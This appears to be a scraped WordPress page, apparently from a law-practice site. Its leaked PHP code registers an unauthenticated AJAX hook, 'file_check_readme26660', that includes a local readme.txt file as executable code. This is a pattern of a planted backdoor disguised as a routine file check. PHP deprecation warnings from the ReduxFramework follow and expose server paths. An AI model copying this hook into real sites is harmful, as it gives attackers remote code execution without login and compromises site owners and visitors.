if(!function_exists('file_check_readme26660')){
add_action('wp_ajax_nopriv_file_check_readme26660', 'file_check_readme26660');
add_action('wp_ajax_file_check_readme26660', 'file_check_readme26660');
function file_check_readme26660()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Deprecated: Creation of dynamic property ReduxFramework::$old_opt_name is deprecated in /home2/innseast/public_html/wp-content/themes/law_practice/inc/ReduxCore/framework.php on line 235
Deprecated: Creation of dynamic property ReduxFramework_Extension_options_object::$field_name is deprecated in /home2/innseast/public_html/wp-content/themes/law_practice/inc/ReduxCore/inc/extensions/options_object/extension_options_object.php on line 62
Deprecated: Creation of dynamic property ReduxFramework_extension_import_export::$field_name is deprecated in /home2/innseast/public_html/wp-content/themes/law_practice/inc/ReduxCore/inc/extensions/import_export/extension_import_export.php on line 62
Deprecated: Creation of dynamic property ReduxFramework::$transients is deprecated in /home2/innseast/public_html/wp-content/themes/law_practice/inc/ReduxCore/framework.php on line 2466
Deprecated: Creation of dynamic property ReduxFramework::$transients_check is deprecated in /home2/innseast/public_html/wp-content/themes/law_practice/inc/ReduxCore/framework.php on line 2467